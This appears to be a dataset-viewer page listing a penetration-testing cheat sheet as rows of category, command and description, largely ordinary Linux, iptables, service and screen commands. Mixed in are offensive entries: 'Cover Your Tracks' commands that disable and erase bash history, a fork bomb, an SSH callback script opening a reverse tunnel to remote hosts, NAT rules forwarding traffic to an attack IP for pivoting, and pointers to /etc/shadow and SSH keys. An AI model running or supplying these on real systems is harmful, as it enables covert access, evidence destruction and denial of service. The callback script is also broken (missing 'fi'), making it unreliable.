category
stringclasses 51
values | command
stringlengths 1
755
| description
stringlengths 3
70
⌀ |
---|---|---|
Linux Cover Your Tracks
|
unset HISTFILE
|
Disable history logging
|
Linux Cover Your Tracks
|
kill -9 $$
|
Kill current session
|
Linux Cover Your Tracks
|
ln /dev/null ~/.bash_history -sf
|
Permanently send bash history to /dev/null
|
Linux File System
|
/bin
|
User binary
|
Linux File System
|
/boot
|
Boot loader files
|
Linux File System
|
/dev
|
Device files
|
Linux File System
|
/etc
|
Configuration files
|
Linux File System
|
/home
|
User home directories
|
Linux File System
|
/lib
|
System libraries
|
Linux File System
|
/opt
|
Optional software
|
Linux File System
|
/proc
|
Process information
|
Linux File System
|
/root
|
Root user home
|
Linux File System
|
/sbin
|
System binaries
|
Linux File System
|
/tmp
|
Temporary files
|
Linux File System
|
/usr
|
User utilities and apps
|
Linux File System
|
/var
|
Variable data (logs, etc.)
|
Linux Scripting
|
for x in $(seq 1 254); do ping -c 1 1.1.1.$x | grep "64 b" | cut -d" " -f4 >> ips.txt; done
|
Ping sweep for live hosts
|
Linux Scripting
|
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in $(seq 1 254); do
host $range.$ip | grep "name pointer" | cut -d" " -f5
done
|
Automated domain name resolve
|
Linux Scripting
|
:(){ :|:& };:
|
Fork bomb (crashes system)
|
Linux Scripting
|
for ip in $(seq 1 254); do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done
|
DNS reverse lookup
|
Linux Scripting
|
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
for ip in $(seq 2 254); do
iptables -A INPUT -s 192.168.1.$ip -j DROP
done
|
IP banning script
|
SSH Callback
|
#!/bin/sh
killall ssh /dev/null 2>&1
sleep 5
REMPORT=4040
REMSRV=user
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS;
do
scount=$(ping -c 2 $LIVEHOST | awk '{print $1}' | grep -c received)
if [ $scount -gt 0 ]; then
ssh -R $REMPORT:localhost:22 -i id_rsa $REMSRV@$LIVEHOST
done
|
Establish SSH callback
|
IPTables
|
iptables-restore file
|
Restore iptables from file
|
IPTables
|
iptables -F
|
Flush all rules
|
IPTables
|
iptables -A INPUT -s ip -j DROP
|
Block incoming traffic from IP
|
IPTables
|
iptables -A OUTPUT -d ip -j DROP
|
Block outgoing traffic to IP
|
IPTables
|
iptables -A INPUT -p tcp --dport port -j DROP
|
Block TCP port incoming
|
IPTables
|
iptables -A OUTPUT -p tcp --dport port -j DROP
|
Block TCP port outgoing
|
IPTables
|
iptables -A INPUT -p udp --dport port -j DROP
|
Block UDP port incoming
|
IPTables
|
iptables -A OUTPUT -p udp --dport port -j DROP
|
Block UDP port outgoing
|
IPTables
|
iptables -A INPUT -i int -j DROP
|
Block interface incoming
|
IPTables
|
iptables -A OUTPUT -o int -j DROP
|
Block interface outgoing
|
IPTables
|
iptables -L -v
|
List rules with stats
|
Linux Files
|
/etc/shadow
|
Local users' hashes
|
Linux Files
|
/etc/passwd
|
Local users
|
Linux Files
|
/etc/group
|
Local groups
|
Linux Files
|
/etc/rc.d
|
Startup services
|
Linux Files
|
/etc/init.d
|
Service
|
Linux Files
|
/etc/hosts
|
Known hostnames and IPs
|
Linux Files
|
/etc/hostname
|
Full hostname with domain
|
Linux Files
|
/etc/network/interfaces
|
Network configuration
|
Linux Files
|
/etc/profile
|
System environment variables
|
Linux Files
|
/etc/apt/sources.list
|
Ubuntu sources list
|
Linux Files
|
/etc/resolv.conf
|
Nameserver configuration
|
Linux Files
|
/home/user/.bash_history
|
Bash history (also /root/)
|
Linux Files
|
/usr/share/wireshark/manuf
|
Vendor-MAC lookup
|
Linux Files
|
~/.ssh/
|
SSH keystore
|
Linux Files
|
/var/log
|
System log files (most Linux)
|
Linux Files
|
/var/adm
|
System log files (Unix)
|
Linux Files
|
/var/spool/cron
|
List cron files
|
Linux Files
|
/var/log/apache/access.log
|
Apache connection log
|
Linux Files
|
/etc/fstab
|
Static file system info
|
Linux Scripting
|
for x in {1..254}; do ping -c 1 1.1.1.$x | grep "64 bytes" | cut -d" " -f4 >> ips.txt; done
|
Ping sweep for live hosts
|
Linux Scripting
|
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254}; do
host $range.$ip | grep "name pointer" | cut -d" " -f5
done
|
Automated domain name resolve
|
Linux Scripting
|
:(){ :|: & };:
|
Fork bomb (crashes system)
|
Linux Scripting
|
for ip in {1..254}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done
|
DNS reverse lookup
|
Linux Scripting
|
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
i=2
while [ $i -le 253 ]; do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: iptables -A INPUT -s 192.168.1.$i -j DROP"
iptables -A INPUT -s 192.168.1.$i -j DROP
else
echo "IP NOT BANNED: 192.168.1.$i"
fi
i=$((i + 1))
done
|
IP banning script
|
IPTables
|
iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
|
Allow SSH on port 22 outbound
|
IPTables
|
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
|
Allow SSH on port 22 inbound
|
IPTables
|
iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
|
Allow ICMP echo-request outbound
|
IPTables
|
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT
|
Allow ICMP echo-reply inbound
|
IPTables
|
echo "1" > /proc/sys/net/ipv4/ip_forward
|
Enable IP forwarding
|
IPTables
|
sysctl net.ipv4.ip_forward=1
|
Enable IP forwarding (alternative)
|
IPTables
|
iptables -t nat -A PREROUTING -p tcp -i eth0 -d pivotip --dport 443 -j DNAT --to-destination attkip:443
|
Port forward TCP 443 to attack IP
|
IPTables
|
iptables -t nat -A POSTROUTING -p tcp -i eth0 -s target_subnet_cidr -d attkip --dport 443 -j SNAT --to-source pivotip
|
Source NAT for port forwarding
|
IPTables
|
iptables -t filter -I FORWARD 1 -j ACCEPT
|
Allow forwarding for port forwarding
|
IPTables
|
iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
|
Allow 1.1.1.0/24 on ports 80,443
|
IPTables
|
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
|
Allow related/established on eth0
|
IPTables
|
iptables -P INPUT DROP
|
Set default INPUT policy to DROP
|
IPTables
|
iptables -A OUTPUT -o eth0 -j ACCEPT
|
Allow all outbound on eth0
|
IPTables
|
iptables -A INPUT -i lo -j ACCEPT
|
Allow loopback inbound
|
IPTables
|
iptables -A OUTPUT -o lo -j ACCEPT
|
Allow loopback outbound
|
IPTables
|
iptables -N LOGGING
|
Create LOGGING chain
|
IPTables
|
iptables -A INPUT -j LOGGING
|
Direct INPUT to LOGGING chain
|
IPTables
|
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
|
Log dropped packets (4/min)
|
IPTables
|
iptables -A LOGGING -j DROP
|
Drop packets in LOGGING chain
|
Update-rc.d
|
service --status-all
|
List existing services and run status
|
Update-rc.d
|
service service start
|
Start a service
|
Update-rc.d
|
service service stop
|
Stop a service
|
Update-rc.d
|
service service status
|
Check status of a service
|
Update-rc.d
|
update-rc.d -f service remove
|
Remove a service startup command
|
Update-rc.d
|
update-rc.d service defaults
|
Add a startup service
|
Chkconfig
|
chkconfig --list
|
List existing services and run status
|
Chkconfig
|
chkconfig service --list
|
Check single service status
|
Chkconfig
|
chkconfig service on [--level 3]
|
Add service (optional run level)
|
Chkconfig
|
chkconfig service off [--level 3]
|
Remove service (optional run level)
|
Chkconfig
|
chkconfig iptables off
|
Example: Disable iptables service
|
Screen
|
screen -S name
|
Start new screen with name
|
Screen
|
screen -ls
|
List running screens
|
Screen
|
screen -r name
|
Attach to screen name
|
Screen
|
screen -S name -X command
|
Send command to screen name
|
Screen
|
Ctrl+a ?
|
List keybindings (help)
|
Screen
|
Ctrl+a d
|
Detach
|
Screen
|
Ctrl+a D D
|
Detach and logout
|
Screen
|
Ctrl+a c
|
Create new window
|
Screen
|
Ctrl+a Ctrl+a
|
Switch to last active window
|
Screen
|
Ctrl+a ' num|name
|
Switch to window num or name
|
Screen
|
Ctrl+a "
|
See windows list and change
|
Screen
|
Ctrl+a k
|
Kill current window
|
Screen
|
Ctrl+a S
|
Split display horizontally
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.